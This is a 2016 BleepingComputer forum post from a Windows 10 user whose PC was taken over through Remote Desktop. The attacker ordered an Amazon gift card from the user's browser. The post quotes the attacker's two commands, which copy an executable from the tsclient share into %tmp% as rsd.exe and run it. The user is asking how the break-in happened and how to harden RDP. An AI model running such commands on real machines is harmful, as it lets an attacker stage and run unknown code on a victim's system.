Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


[Help] Compromised. Where did I go wrong?

  • Please log in to reply
No replies to this topic

#1 musicims


  • Members
  • 1 posts
  • Local time:12:47 PM

Posted 17 November 2016 - 08:05 PM

A few days ago I was welcomed with a command screen showing that someone used the windows internal tsclient to copy a file into my tmp directory and run it.I had thought that I had TS turned off. Whatever this .exe is was used to RDP into my computer a couple days later in the middle of the night to pull up my own browser and order a digital gift card from Amazon, which I'm never logged out of.



>copy /y \tsclient\g\sysscan.exe %tmp%\rsd.exe

>%tmp%\rsd.exe 775157 0 1


I even had the RDP port changed from default and it is forwarded to the static IP of this machine, which is always on. How did they first gain TS access if I had left it on? Is it really that easy? Second RDP access? Easy enough if I dont use a MS live account and they were able to retrieve my NT pw? Or did they insert their own credentials?


Also does anyone know what this rsd.exe is or what it does so I can try and track down what was changed. I have not made an image backup in probably 6 months and really, really would not like to go back that far. Also what can I do to prevent this again? I know that I should make sure TS is turned off and probably have certs for the RDP, but is there anything else?


Win10Pro x64. Webroot AV and "firewall", Win10 Firewall



BC AdBot (Login to Remove)


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users